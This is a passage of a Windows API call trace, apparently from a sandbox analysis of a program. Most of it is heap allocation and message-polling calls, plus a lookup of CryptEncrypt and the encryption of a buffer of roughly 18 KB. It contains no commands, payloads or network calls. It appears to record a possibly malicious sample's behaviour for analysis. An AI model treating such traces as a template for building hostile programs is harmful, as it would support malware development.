(HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0259.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0259.477] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.477] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0259.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0259.478] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.478] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0259.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0259.478] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0259.478] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.478] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.478] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.478] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0259.478] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0259.479] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.479] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0259.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0259.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0259.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0259.479] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.479] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0259.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0259.480] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0259.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0259.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0259.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0259.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51bc8 [0259.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51bc8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0259.480] CryptEncrypt (in: hKey=0xa87110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x4997, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x4998) returned 1 [0259.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0259.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0259.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0259.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0259.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0259.481] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0259.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0259.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0259.481] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.481] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0259.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0259.482] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0259.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0259.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0259.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0259.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0259.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0259.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0259.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0259.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0259.483] CharLowerBuffW (in: lpsz="byte[18840]", cchLength=0xb | out: lpsz="byte[18840]") returned 0xb [0259.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0259.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0259.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0259.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0259.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0259.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0259.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0259.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0259.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4998) returned 0x2f1d350 [0259.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0259.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0259.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0259.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0259.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0259.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0259.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0259.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0259.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0259.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0259.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0259.486] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0259.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0259.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0259.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0259.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0259.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0259.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0259.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0259.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0259.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4997) returned 0x2f21cf0 [0259.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0259.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4997) returned 0x2f26690 [0259.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0259.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0259.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0259.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0259.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f21cf0 | out: hHeap=0x970000) returned 1 [0259.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0259.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f26690 | out: hHeap=0x970000) returned 1 [0259.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.549] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0259.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0259.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0259.549] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.549] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0259.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51e80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0259.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.550] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0259.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.550] CryptEncrypt (in: hKey=0xa87110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1d350*, pdwDataLen=0x8cef60*=0x4997, dwBufLen=0x4998 | out: pbData=0x2f1d350*, pdwDataLen=0x8cef60*=0x4998) returned 1 [0259.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0259.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0259.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0259.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0259.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0259.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0259.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0259.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0259.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0259.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0259.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0259.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0259.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0259.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0259.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0259.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0259.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0259.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0259.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0259.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0259.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0259.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0259.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0259.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0259.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0259.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0259.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0259.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0259.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0259.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0259.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0259.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f70 [0259.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0259.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0259.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0259.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f70 | out: hHeap=0x970000) returned 1 [0259.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ef8 [0259.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f88 [0259.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52060 [0259.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0259.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52060 | out: hHeap=0x970000) returned 1 [0259.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f88 | out: hHeap=0x970000) returned 1 [0259.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: 